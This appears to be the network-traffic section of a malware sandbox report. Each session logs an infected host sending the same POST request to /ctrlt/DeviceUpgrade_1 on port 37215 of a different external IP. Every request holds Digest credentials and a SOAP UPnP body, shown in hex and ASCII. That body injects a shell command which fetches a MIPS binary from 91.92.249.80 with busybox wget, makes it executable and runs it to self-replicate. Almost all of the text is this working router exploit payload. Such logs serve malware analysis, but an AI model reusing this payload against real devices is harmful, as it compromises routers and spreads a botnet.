                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2400192.168.2.2343816157.67.45.21937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.685991049 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2401192.168.2.233928441.123.181.21037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.686992884 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2402192.168.2.2355834197.128.100.17037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.687031984 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2403192.168.2.2356732157.180.177.6437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.687361956 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2404192.168.2.2339102197.184.8.17037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.687410116 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2405192.168.2.2351966157.122.136.25537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.687446117 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2406192.168.2.2335810197.142.30.13837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.688994884 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2407192.168.2.2360808157.102.97.19037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.689030886 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2408192.168.2.2344878197.134.196.24537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.689908028 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2409192.168.2.2334236118.15.8.1437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.689974070 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f 